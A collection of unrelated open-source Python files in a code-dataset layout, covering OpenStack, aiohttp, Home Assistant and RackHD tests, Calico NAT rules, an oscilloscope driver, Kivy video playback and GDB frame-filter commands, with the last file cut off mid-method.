_translators = oslo_i18n.TranslatorFactory(domain='murano')
# The primary translation function using the well-known name "_"
_ = _translators.primary
# Translators for log levels.
#
# The abbreviated names are meant to reflect the usual use of a short
# name like '_'. The "L" is for "log" and the other letter comes from
# the level.
_LI = _translators.log_info
_LW = _translators.log_warning
_LE = _translators.log_error
_LC = _translators.log_critical
| olivierlemasle/murano | murano/common/i18n.py | Python | apache-2.0 | 1,149 |
import pytest
import aiohttp
from aiohttp import web
@pytest.mark.run_loop
async def test_client_ws_async_for(loop, create_server):
items = ['q1', 'q2', 'q3']
async def handler(request):
ws = web.WebSocketResponse()
await ws.prepare(request)
for i in items:
ws.send_str(i)
await ws.close()
return ws
app, url = await create_server(proto='ws')
app.router.add_route('GET', '/', handler)
resp = await aiohttp.ws_connect(url, loop=loop)
it = iter(items)
async for msg in resp:
assert msg.data == next(it)
with pytest.raises(StopIteration):
next(it)
assert resp.closed
@pytest.mark.run_loop
async def test_client_ws_async_with(loop, create_app_and_client):
async def handler(request):
ws = web.WebSocketResponse()
await ws.prepare(request)
msg = await ws.receive()
ws.send_str(msg.data + '/answer')
await ws.close()
return ws
app, client = await create_app_and_client(
server_params=dict(proto='ws'))
app.router.add_route('GET', '/', handler)
async with client.ws_connect('/') as ws:
ws.send_str('request')
msg = await ws.receive()
assert msg.data == 'request/answer'
assert ws.closed
@pytest.mark.run_loop
async def test_client_ws_async_with_shortcut(loop, create_server):
async def handler(request):
ws = web.WebSocketResponse()
await ws.prepare(request)
msg = await ws.receive()
ws.send_str(msg.data + '/answer')
await ws.close()
return ws
app, url = await create_server(proto='ws')
app.router.add_route('GET', '/', handler)
async with aiohttp.ws_connect(url, loop=loop) as ws:
ws.send_str('request')
msg = await ws.receive()
assert msg.data == 'request/answer'
assert ws.closed
| jashandeep-sohi/aiohttp | tests/test_py35/test_client_websocket_35.py | Python | apache-2.0 | 1,892 |
"""Test Agent DVR integration."""
from unittest.mock import AsyncMock, patch
from agent import AgentError
from homeassistant.components.agent_dvr.const import DOMAIN
from homeassistant.config_entries import ConfigEntryState
from homeassistant.core import HomeAssistant
from . import CONF_DATA, create_entry
from tests.components.agent_dvr import init_integration
from tests.test_util.aiohttp import AiohttpClientMocker
async def _create_mocked_agent(available: bool = True):
mocked_agent = AsyncMock()
mocked_agent.is_available = available
return mocked_agent
def _patch_init_agent(mocked_agent):
return patch(
"homeassistant.components.agent_dvr.Agent",
return_value=mocked_agent,
)
async def test_setup_config_and_unload(
hass: HomeAssistant, aioclient_mock: AiohttpClientMocker
):
"""Test setup and unload."""
entry = await init_integration(hass, aioclient_mock)
assert entry.state == ConfigEntryState.LOADED
assert len(hass.config_entries.async_entries(DOMAIN)) == 1
assert entry.data == CONF_DATA
assert await hass.config_entries.async_unload(entry.entry_id)
await hass.async_block_till_done()
assert entry.state is ConfigEntryState.NOT_LOADED
assert not hass.data.get(DOMAIN)
async def test_async_setup_entry_not_ready(hass: HomeAssistant):
"""Test that it throws ConfigEntryNotReady when exception occurs during setup."""
entry = create_entry(hass)
with patch(
"homeassistant.components.agent_dvr.Agent.update",
side_effect=AgentError,
):
await hass.config_entries.async_setup(entry.entry_id)
assert entry.state == ConfigEntryState.SETUP_RETRY
with _patch_init_agent(await _create_mocked_agent(available=False)):
await hass.config_entries.async_reload(entry.entry_id)
assert entry.state == ConfigEntryState.SETUP_RETRY
| jawilson/home-assistant | tests/components/agent_dvr/test_init.py | Python | apache-2.0 | 1,876 |
'''
Copyright 2017 Dell Inc. or its subsidiaries. All Rights Reserved.
Author(s):
George Paulos
This script tests minimum payload base case of the RackHD API 2.0 OS bootstrap workflows using NFS mount or local repo method.
This routine runs OS bootstrap jobs simultaneously on multiple nodes.
For 12 tests to run, 12 nodes are required in the stack. If there are less than that, tests will be skipped.
This test takes 15-20 minutes to run.
OS bootstrap tests require the following entries in config/install_default.json.
If an entry is missing, then that test will be skipped.
The order of entries determines the priority of the test. First one runs on first available node, etc.
"os-install": [
{
"kvm": false,
"path": "/repo/esxi/5.5",
"version": "5.5",
"workflow": "Graph.InstallESXi"
},
{
"kvm": false,
"path": "/repo/esxi/6.0",
"version": "6.0",
"workflow": "Graph.InstallESXi"
},
{
"kvm": false,
"path": "/repo/centos/6.5",
"version": "6.5",
"workflow": "Graph.InstallCentOS"
},
{
"kvm": false,
"path": "/repo/centos/7.0",
"version": "7.0",
"workflow": "Graph.InstallCentOS"
},
{
"kvm": false,
"path": "/repo/rhel/7.0",
"version": "7.0",
"workflow": "Graph.InstallRHEL"
},
{
"kvm": false,
"path": "/repo/suse/42.1",
"version": "42.1",
"workflow": "Graph.InstallSUSE"
},
{
"kvm": false,
"path": "/repo/ubuntu",
"version": "trusty",
"workflow": "Graph.InstallUbuntu"
},
{
"kvm": false,
"path": "/repo/coreos",
"version": "899.17.0",
"workflow": "Graph.InstallCoreOS"
},
{
"kvm": true,
"path": "/repo/rhel/7.0",
"version": "7.0",
"workflow": "Graph.InstallRHEL"
},
{
"kvm": true,
"path": "/repo/centos/6.5",
"version": "6.5",
"workflow": "Graph.InstallCentOS"
},
{
"kvm": false,
"path": "/repo/winpe",
"productkey": "XXXXX-XXXXX-XXXXX-XXXXX-XXXXX",
"smbPassword": "onrack",
"smbRepo": "\\windowsServer2012",
"smbUser": "onrack",
"version": "2012",
"workflow": "Graph.InstallWindowsServer"
}
],
The OS repos are to be installed under 'on-http/static/http' directory reflecting the paths above.
These can be files, links, or nfs mounts to remote repos in the following dirs:
on-http/static/http/windowsServer2012 -- requires Samba share on RackHD server
on-http/static/http/repo/centos/6.5
on-http/static/http/repo/centos/7.0
on-http/static/http/repo/rhel/7.0
on-http/static/http/repo/suse/42.1
on-http/static/http/repo/esxi/5.5
on-http/static/http/repo/esxi/6.0
on-http/static/http/repo/winpe
on-http/static/http/repo/coreos/899.17.0
'''
import fit_path # NOQA: unused import
from nose.plugins.attrib import attr
import fit_common
import flogging
import sys
log = flogging.get_loggers()
# This gets the list of nodes
NODECATALOG = fit_common.node_select()
# dict containing bootstrap workflow IDs and states
NODE_STATUS = {}
# global timer
START_TIME = fit_common.time.time()
# collect repo information from config files
OSLIST = fit_common.fitcfg()["install-config"]["os-install"]
# download RackHD config from host
rackhdresult = fit_common.rackhdapi('/api/2.0/config')
if rackhdresult['status'] != 200:
log.error(" Unable to contact host, exiting. ")
sys.exit(255)
rackhdconfig = rackhdresult['json']
statichost = "http://" + str(rackhdconfig['fileServerAddress']) + ":" + str(rackhdconfig['fileServerPort'])
# this routine polls a workflow task ID for completion
def wait_for_workflow_complete(taskid):
result = None
while fit_common.time.time() - START_TIME < 1800 or result is None: # limit test to 30 minutes
result = fit_common.rackhdapi("/api/2.0/workflows/" + taskid)
if result['status'] != 200:
log.error(" HTTP error: " + result['text'])
return False
if result['json']['status'] == 'running' or result['json']['status'] == 'pending':
log.info_5("{} workflow status: {}".format(result['json']['injectableName'], result['json']['status']))
fit_common.time.sleep(30)
elif result['json']['status'] == 'succeeded':
log.info_5("{} workflow status: {}".format(result['json']['injectableName'], result['json']['status']))
return True
else:
log.error(" Workflow failed: " + result['text'])
return False
log.error(" Workflow Timeout: " + result['text'])
return False
# helper routine to return the task ID associated with the running bootstrap workflow
def node_taskid(workflow, version, kvm):
for entry in NODE_STATUS:
if NODE_STATUS[entry]['workflow'] == workflow \
and str(version) in NODE_STATUS[entry]['version'] \
and NODE_STATUS[entry]['kvm'] == kvm:
return NODE_STATUS[entry]['id']
return ""
# Match up tests to node IDs to feed skip decorators
index = 0 # node index
for item in OSLIST:
if index < len(NODECATALOG):
NODE_STATUS[NODECATALOG[index]] = \
{"workflow": item['workflow'], "version": item['version'], "kvm": item['kvm'], "id": "Pending"}
index += 1
# ------------------------ Tests -------------------------------------
@attr(all=False)
class api20_bootstrap_base(fit_common.unittest.TestCase):
@classmethod
def setUpClass(cls):
# run all OS install workflows first
nodeindex = 0
for item in OSLIST:
# if OS proxy entry exists in RackHD config, run bootstrap against selected node
if nodeindex < len(NODECATALOG):
# delete active workflows for specified node
fit_common.cancel_active_workflows(NODECATALOG[nodeindex])
# base payload common to all Linux
payload_data = {"options": {"defaults": {
"version": item['version'],
"kvm": item['kvm'],
"repo": statichost + item['path'],
"rootPassword": "1234567",
"hostname": "rackhdnode",
"users": [{"name": "rackhduser",
"password": "RackHDRocks!",
"uid": 1010}]}}}
# OS specific payload requirements
if item['workflow'] == "Graph.InstallUbuntu":
payload_data["options"]["defaults"]["baseUrl"] = "install/netboot/ubuntu-installer/amd64"
payload_data["options"]["defaults"]["kargs"] = {"live-installer/net-image": statichost +
item['path'] + "/ubuntu/install/filesystem.squashfs"}
if item['workflow'] == "Graph.InstallWindowsServer":
payload_data["options"]["defaults"]["productkey"] = item['productkey']
payload_data["options"]["defaults"]["smbUser"] = item['smbUser']
payload_data["options"]["defaults"]["smbPassword"] = item['smbPassword']
payload_data["options"]["defaults"]["smbRepo"] = "\\\\" + str(rackhdconfig['apiServerAddress']) + \
item['smbRepo']
payload_data["options"]["defaults"]["username"] = "rackhduser"
payload_data["options"]["defaults"]["password"] = "RackHDRocks!"
payload_data["options"]["defaults"].pop('rootPassword', None)
payload_data["options"]["defaults"].pop('users', None)
payload_data["options"]["defaults"].pop('kvm', None)
payload_data["options"]["defaults"].pop('version', None)
# run workflow
result = fit_common.rackhdapi('/api/2.0/nodes/' +
NODECATALOG[nodeindex] +
'/workflows?name=' + item['workflow'],
action='post', payload=payload_data)
if result['status'] == 201:
# this saves the task and node IDs
NODE_STATUS[NODECATALOG[nodeindex]] = \
{"workflow": item['workflow'],
"version": item['version'],
"kvm": item['kvm'],
"id": result['json']['instanceId']}
log.info_5(" TaskID: " + result['json']['instanceId'])
log.info_5(" Payload: " + fit_common.json.dumps(payload_data))
else:
# if no task ID is returned put 'failed' in ID field
NODE_STATUS[NODECATALOG[nodeindex]] = \
{"workflow": item['workflow'],
"version": item['version'],
"kvm": item['kvm'],
'id': "failed"}
log.error(" OS install " + item['workflow'] + " on node " + NODECATALOG[nodeindex] + " failed! ")
log.error(" Error text: " + result['text'])
log.error(" Payload: " + fit_common.json.dumps(payload_data))
# increment node index to run next bootstrap
nodeindex += 1
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallESXi", "5.", False) != '',
"Skipping ESXi5.5, repo not configured or node unavailable")
def test_api20_bootstrap_esxi5(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallESXi", "5.", False)), "ESXi5.5 failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallESXi", "6.", False) != '',
"Skipping ESXi6.0, repo not configured or node unavailable")
def test_api20_bootstrap_esxi6(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallESXi", "6.", False)), "ESXi6.0 failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallCentOS", "6.", False) != '',
"Skipping Centos 6.5, repo not configured or node unavailable")
def test_api20_bootstrap_centos6(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallCentOS", "6.", False)), "Centos 6.5 failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallCentOS", "6.", True) != '',
"Skipping Centos 6.5 KVM, repo not configured or node unavailable")
def test_api20_bootstrap_centos6_kvm(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallCentOS", "6.", True)), "Centos 6.5 KVM failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallCentOS", "7.", False) != '',
"Skipping Centos 7.0, repo not configured or node unavailable")
def test_api20_bootstrap_centos7(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallCentOS", "7.", False)), "Centos 7.0 failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallCentOS", "7.", True) != '',
"Skipping Centos 7.0 KVM, repo not configured or node unavailable")
def test_api20_bootstrap_centos7_kvm(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallCentOS", "7.", True)), "Centos 7.0 KVM failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallRHEL", "7.", False) != '',
"Skipping Redhat 7.0, repo not configured or node unavailable")
def test_api20_bootstrap_rhel7(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallRHEL", "7.", False)), "RHEL 7.0 failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallRHEL", "7.", True) != '',
"Skipping Redhat 7.0 KVM, repo not configured or node unavailable")
def test_api20_bootstrap_rhel7_kvm(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallRHEL", "7.", True)), "RHEL 7.0 KVM failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallUbuntu", "trusty", False) != '',
"Skipping Ubuntu 14, repo not configured or node unavailable")
def test_api20_bootstrap_ubuntu14(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallUbuntu", "trusty", False)), "Ubuntu 14 failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallCoreOS", "899.", False) != '',
"Skipping CoreOS 899.17.0, repo not configured or node unavailable")
def test_api20_bootstrap_coreos899(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallCoreOS", "899.", False)), "CoreOS 899.17 failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallSUSE", "42.", False) != '',
"Skipping SuSe 42, repo not configured or node unavailable")
def test_api20_bootstrap_suse(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallSUSE", "42.", False)), "SuSe 42 failed.")
@fit_common.unittest.skipUnless(node_taskid("Graph.InstallWindowsServer", "2012", False) != '',
"Skipping Windows 2012, repo not configured or node unavailable")
def test_api20_bootstrap_windows(self):
self.assertTrue(wait_for_workflow_complete(node_taskid("Graph.InstallWindowsServer", "2012", False)), "Win2012 failed.")
if __name__ == '__main__':
fit_common.unittest.main()
| uppalk1/RackHD | test/tests/bootstrap/test_api20_os_bootstrap_parallel_local.py | Python | apache-2.0 | 14,582 |
# Copyright (c) Metaswitch Networks 2015. All rights reserved.
import logging
from calico.felix.actor import Actor, actor_message
from calico.felix.futils import IPV4, IPV6
from calico.felix.ipsets import Ipset, FELIX_PFX
_log = logging.getLogger(__name__)
ALL_POOLS_SET_NAME = FELIX_PFX + "all-ipam-pools"
MASQ_POOLS_SET_NAME = FELIX_PFX + "masq-ipam-pools"
MASQ_RULE_FRAGMENT = ("POSTROUTING "
"--match set --match-set %s src "
"--match set ! --match-set %s dst "
"--jump MASQUERADE" % (MASQ_POOLS_SET_NAME,
ALL_POOLS_SET_NAME))
class MasqueradeManager(Actor):
def __init__(self, ip_type, iptables_mgr):
super(MasqueradeManager, self).__init__(qualifier=str(ip_type))
assert ip_type in (IPV4, IPV6)
assert iptables_mgr.table == "nat"
self.ip_type = ip_type
self.pools_by_id = {}
self._iptables_mgr = iptables_mgr
ip_family = "inet" if ip_type == IPV4 else "inet6"
self._all_pools_ipset = Ipset(ALL_POOLS_SET_NAME,
ALL_POOLS_SET_NAME + "-tmp",
ip_family,
"hash:net")
self._masq_pools_ipset = Ipset(MASQ_POOLS_SET_NAME,
MASQ_POOLS_SET_NAME + "-tmp",
ip_family,
"hash:net")
self._dirty = False
@actor_message()
def apply_snapshot(self, pools_by_id):
_log.info("Applying IPAM pool snapshot with %s pools",
len(pools_by_id))
self.pools_by_id.clear()
self.pools_by_id.update(pools_by_id)
self._dirty = True
@actor_message()
def on_ipam_pool_updated(self, pool_id, pool):
if self.pools_by_id.get(pool_id) != pool:
if pool is None:
_log.info("IPAM pool deleted: %s", pool_id)
del self.pools_by_id[pool_id]
else:
_log.info("IPAM pool %s updated: %s", pool_id, pool)
self.pools_by_id[pool_id] = pool
self._dirty = True
def _finish_msg_batch(self, batch, results):
_log.debug("Finishing batch of IPAM pool changes")
if self._dirty:
_log.info("Marked as dirty, looking for masq-enabled pools")
masq_enabled_cidrs = set()
all_cidrs = set()
for pool in self.pools_by_id.itervalues():
all_cidrs.add(pool["cidr"])
if pool.get("masquerade", False):
masq_enabled_cidrs.add(pool["cidr"])
if masq_enabled_cidrs:
_log.info("There are masquerade-enabled pools present. "
"Updating.")
self._all_pools_ipset.replace_members(all_cidrs)
self._masq_pools_ipset.replace_members(masq_enabled_cidrs)
# Enable masquerading for traffic coming from pools that
# have it enabled only when the traffic is heading to an IP
# that isn't in any Calico-owned pool. (We assume that NAT
# is not required for Calico-owned IPs.)
self._iptables_mgr.ensure_rule_inserted(MASQ_RULE_FRAGMENT,
async=True)
else:
_log.info("No masquerade-enabled pools present. "
"Removing rules and ipsets.")
# Ensure that the rule doesn't exist before we try to remove
# our ipsets. Have to make a blocking call so that we don't
# try to remove the ipsets before we've cleaned up the rule
# that references them.
self._iptables_mgr.ensure_rule_removed(MASQ_RULE_FRAGMENT,
async=False)
# Safe to call even if the ipsets don't exist:
self._all_pools_ipset.delete()
self._masq_pools_ipset.delete()
self._dirty = False
_log.info("Finished refreshing ipsets")
| alexhersh/calico | calico/felix/masq.py | Python | apache-2.0 | 4,208 |
# Copyright 2016 Intel Corporation
# Copyright 2015 Hewlett Packard Development Company, LP
# Copyright 2015 Universidade Federal de Campina Grande
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from ironic.common.i18n import _
opts = [
cfg.StrOpt('manager_url',
help=_('URL where OneView is available.')),
cfg.StrOpt('username',
help=_('OneView username to be used.')),
cfg.StrOpt('password',
secret=True,
help=_('OneView password to be used.')),
cfg.BoolOpt('allow_insecure_connections',
default=False,
help=_('Option to allow insecure connection with OneView.')),
cfg.StrOpt('tls_cacert_file',
help=_('Path to CA certificate.')),
cfg.IntOpt('max_polling_attempts',
default=12,
help=_('Max connection retries to check changes on OneView.')),
cfg.BoolOpt('enable_periodic_tasks',
default=True,
help=_('Whether to enable the periodic tasks for OneView '
'driver be aware when OneView hardware resources are '
'taken and released by Ironic or OneView users '
'and proactively manage nodes in clean fail state '
'according to Dynamic Allocation model of hardware '
'resources allocation in OneView.')),
cfg.IntOpt('periodic_check_interval',
default=300,
help=_('Period (in seconds) for periodic tasks to be '
'executed when enable_periodic_tasks=True.')),
]
def register_opts(conf):
conf.register_opts(opts, group='oneview')
| SauloAislan/ironic | ironic/conf/oneview.py | Python | apache-2.0 | 2,255 |
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2012-2014 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .agilent90000 import *
class agilentDSA91204A(agilent90000):
"Agilent Infiniium DSA91204A IVI oscilloscope driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', 'DSO91204A')
super(agilentDSA91204A, self).__init__(*args, **kwargs)
self._analog_channel_count = 4
self._digital_channel_count = 0
self._channel_count = 4
self._bandwidth = 12e9
self._init_channels()
| elopezga/ErrorRate | ivi/agilent/agilentDSA91204A.py | Python | mit | 1,632 |
'''
FFmpeg video abstraction
========================
.. versionadded:: 1.0.8
This abstraction requires ffmpeg python extensions. We have made a special
extension that is used for the android platform but can also be used on x86
platforms. The project is available at::
http://github.com/tito/ffmpeg-android
The extension is designed for implementing a video player.
Refer to the documentation of the ffmpeg-android project for more information
about the requirements.
'''
try:
import ffmpeg
except:
raise
from kivy.core.video import VideoBase
from kivy.graphics.texture import Texture
class VideoFFMpeg(VideoBase):
def __init__(self, **kwargs):
self._do_load = False
self._player = None
super(VideoFFMpeg, self).__init__(**kwargs)
def unload(self):
if self._player:
self._player.stop()
self._player = None
self._state = ''
self._do_load = False
def load(self):
self.unload()
def play(self):
if self._player:
self.unload()
self._player = ffmpeg.FFVideo(self._filename)
self._player.set_volume(self._volume)
self._do_load = True
def stop(self):
self.unload()
def seek(self, percent, precise=True):
if self._player is None:
return
self._player.seek(percent)
def _do_eos(self):
self.unload()
self.dispatch('on_eos')
super(VideoFFMpeg, self)._do_eos()
def _update(self, dt):
if self._do_load:
self._player.open()
self._do_load = False
return
player = self._player
if player is None:
return
if not player.is_open:
self._do_eos()
return
frame = player.get_next_frame()
if frame is None:
return
# first time we got a frame, we know that video is readed now.
if self._texture is None:
self._texture = Texture.create(size=(
player.get_width(), player.get_height()),
colorfmt='rgb')
self._texture.flip_vertical()
self.dispatch('on_load')
if self._texture:
self._texture.blit_buffer(frame)
self.dispatch('on_frame')
def _get_duration(self):
if self._player is None:
return 0
return self._player.get_duration()
def _get_position(self):
if self._player is None:
return 0
return self._player.get_position()
def _set_volume(self, value):
self._volume = value
if self._player:
self._player.set_volume(self._volume)
| Cheaterman/kivy | kivy/core/video/video_ffmpeg.py | Python | mit | 2,694 |
def test():
for i in xrange(int(5e3)):
t = []
for j in xrange(int(1e4)):
#t[j] = 'x'
t.append('x')
t = ''.join(t)
test()
| svaarala/duktape | tests/perf/test-string-array-concat.py | Python | mit | 174 |
# Frame-filter commands.
# Copyright (C) 2013-2019 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""GDB commands for working with frame-filters."""
import sys
import gdb
import copy
from gdb.FrameIterator import FrameIterator
from gdb.FrameDecorator import FrameDecorator
import gdb.frames
import itertools
# GDB Commands.
class SetFilterPrefixCmd(gdb.Command):
"""Prefix command for 'set' frame-filter related operations."""
def __init__(self):
super(SetFilterPrefixCmd, self).__init__("set frame-filter",
gdb.COMMAND_OBSCURE,
gdb.COMPLETE_NONE, True)
class ShowFilterPrefixCmd(gdb.Command):
"""Prefix command for 'show' frame-filter related operations."""
def __init__(self):
super(ShowFilterPrefixCmd, self).__init__("show frame-filter",
gdb.COMMAND_OBSCURE,
gdb.COMPLETE_NONE, True)
class InfoFrameFilter(gdb.Command):
"""List all registered Python frame-filters.
Usage: info frame-filters"""
def __init__(self):
super(InfoFrameFilter, self).__init__("info frame-filter",
gdb.COMMAND_DATA)
@staticmethod
def enabled_string(state):
"""Return "Yes" if filter is enabled, otherwise "No"."""
if state:
return "Yes"
else:
return "No"
def print_list(self, title, frame_filters, blank_line):
sorted_frame_filters = sorted(frame_filters.items(),
key=lambda i: gdb.frames.get_priority(i[1]),
reverse=True)
if len(sorted_frame_filters) == 0:
return 0
print(title)
print(" Priority Enabled Name")
for frame_filter in sorted_frame_filters:
name = frame_filter[0]
try:
priority = '{:<8}'.format(
str(gdb.frames.get_priority(frame_filter[1])))
enabled = '{:<7}'.format(
self.enabled_string(gdb.frames.get_enabled(frame_filter[1])))
print(" %s %s %s" % (priority, enabled, name))
except Exception:
e = sys.exc_info()[1]
print(" Error printing filter '"+name+"': "+str(e))
if blank_line:
print("")
return 1
def invoke(self, arg, from_tty):
any_printed = self.print_list("global frame-filters:", gdb.frame_filters, True)
cp = gdb.current_progspace()
any_printed += self.print_list("progspace %s frame-filters:" % cp.filename,
cp.frame_filters, True)
for objfile in gdb.objfiles():
any_printed += self.print_list("objfile %s frame-filters:" % objfile.filename,
objfile.frame_filters, False)
if any_printed == 0:
print ("No frame filters.")
# Internal enable/disable functions.
def _enable_parse_arg(cmd_name, arg):
""" Internal worker function to take an argument from
enable/disable and return a tuple of arguments.
Arguments:
cmd_name: Name of the command invoking this function.
args: The argument as a string.
Returns:
A tuple containing the dictionary, and the argument, or just
the dictionary in the case of "all".
"""
argv = gdb.string_to_argv(arg);
argc = len(argv)
if argc == 0:
raise gdb.GdbError(cmd_name + " requires an argument")
if argv[0] == "all":
if argc > 1:
raise gdb.GdbError(cmd_name + ": with 'all' " \
"you may not specify a filter.")
elif argc != 2:
raise gdb.GdbError(cmd_name + " takes exactly two arguments.")
return argv
def _do_enable_frame_filter(command_tuple, flag):
"""Worker for enabling/disabling frame_filters.
Arguments:
command_type: A tuple with the first element being the
frame filter dictionary, and the second being
the frame filter name.
flag: True for Enable, False for Disable.
"""
list_op = command_tuple[0]
op_list = gdb.frames.return_list(list_op)
if list_op == "all":
for item in op_list:
gdb.frames.set_enabled(item, flag)
else:
frame_filter = command_tuple[1]
try:
ff = op_list[frame_filter]
except KeyError:
msg = "frame-filter '" + str(frame_filter) + "' not found."
raise gdb.GdbError(msg)
gdb.frames.set_enabled(ff, flag)
def _complete_frame_filter_list(text, word, all_flag):
"""Worker for frame filter dictionary name completion.
Arguments:
text: The full text of the command line.
word: The most recent word of the command line.
all_flag: Whether to include the word "all" in completion.
Returns:
A list of suggested frame filter dictionary name completions
from text/word analysis. This list can be empty when there
are no suggestions for completion.
"""
if all_flag == True:
filter_locations = ["all", "global", "progspace"]
else:
filter_locations = ["global", "progspace"]
for objfile in gdb.objfiles():
filter_locations.append(objfile.filename)
# If the user just asked for completions with no completion
# hints, just return all the frame filter dictionaries we know
# about.
if (text == ""):
return filter_locations
# Otherwise filter on what we know.
flist = filter(lambda x,y=text:x.startswith(y), filter_locations)
# If we only have one completion, complete it and return it.
if len(flist) == 1:
flist[0] = flist[0][len(text)-len(word):]
# Otherwise, return an empty list, or a list of frame filter
# dictionaries that the previous filter operation returned.
return flist
def _complete_frame_filter_name(word, printer_dict):
"""Worker for frame filter name completion.
Arguments:
word: The most recent word of the command line.
printer_dict: The frame filter dictionary to search for frame
filter name completions.
Returns: A list of suggested frame filter name completions
from word analysis of the frame filter dictionary. This list
can be empty when there are no suggestions for completion.
"""
printer_keys = printer_dict.keys()
if (word == ""):
return printer_keys
flist = filter(lambda x,y=word:x.startswith(y), printer_keys)
return flist
class EnableFrameFilter(gdb.Command):
"""GDB command to enable the specified frame-filter.
Usage: enable frame-filter DICTIONARY [NAME]
DICTIONARY is the name of the frame filter dictionary on which to
operate. If dictionary is set to "all", perform operations on all
dictionaries. Named dictionaries are: "global" for the global
frame filter dictionary, "progspace" for the program space's frame
filter dictionary. If either all, or the two named dictionaries
are not specified, the dictionary name is assumed to be the name
of an "objfile" -- a shared library or an executable.
NAME matches the name of the frame-filter to operate on."""
def __init__(self):
super(EnableFrameFilter, self).__init__("enable frame-filter",
gdb.COMMAND_DATA)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, True)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = _enable_parse_arg("enable frame-filter", arg)
_do_enable_frame_filter(command_tuple, True)
class DisableFrameFilter(gdb.Command):
"""GDB command to disable the specified frame-filter.
Usage: disable frame-filter DICTIONARY [NAME]
DICTIONARY is the name of the frame filter dictionary on which to
operate. If dictionary is set to "all", perform operations on all
dictionaries. Named dictionaries are: "global" for the global
frame filter dictionary, "progspace" for the program space's frame
filter dictionary. If either all, or the two named dictionaries
are not specified, the dictionary name is assumed to be the name
of an "objfile" -- a shared library or an executable.
NAME matches the name of the frame-filter to operate on."""
def __init__(self):
super(DisableFrameFilter, self).__init__("disable frame-filter",
gdb.COMMAND_DATA)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, True)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = _enable_parse_arg("disable frame-filter", arg)
_do_enable_frame_filter(command_tuple, False)
class SetFrameFilterPriority(gdb.Command):
"""GDB command to set the priority of the specified frame-filter.
Usage: set frame-filter priority DICTIONARY NAME PRIORITY
DICTIONARY is the name of the frame filter dictionary on which to
operate. Named dictionaries are: "global" for the global frame
filter dictionary, "progspace" for the program space's framefilter
dictionary. If either of these two are not specified, the
dictionary name is assumed to be the name of an "objfile" -- a
shared library or an executable.
NAME matches the name of the frame filter to operate on.
PRIORITY is the an integer to assign the new priority to the frame
filter."""
def __init__(self):
super(SetFrameFilterPriority, self).__init__("set frame-filter " \
"priority",
gdb.COMMAND_DATA)
def _parse_pri_arg(self, arg):
"""Internal worker to parse a priority from a tuple.
Arguments:
arg: Tuple which contains the arguments from the command.
Returns:
A tuple containing the dictionary, name and priority from
the arguments.
Raises:
gdb.GdbError: An error parsing the arguments.
"""
argv = gdb.string_to_argv(arg);
argc = len(argv)
if argc != 3:
print("set frame-filter priority " \
"takes exactly three arguments.")
return None
return argv
def _set_filter_priority(self, command_tuple):
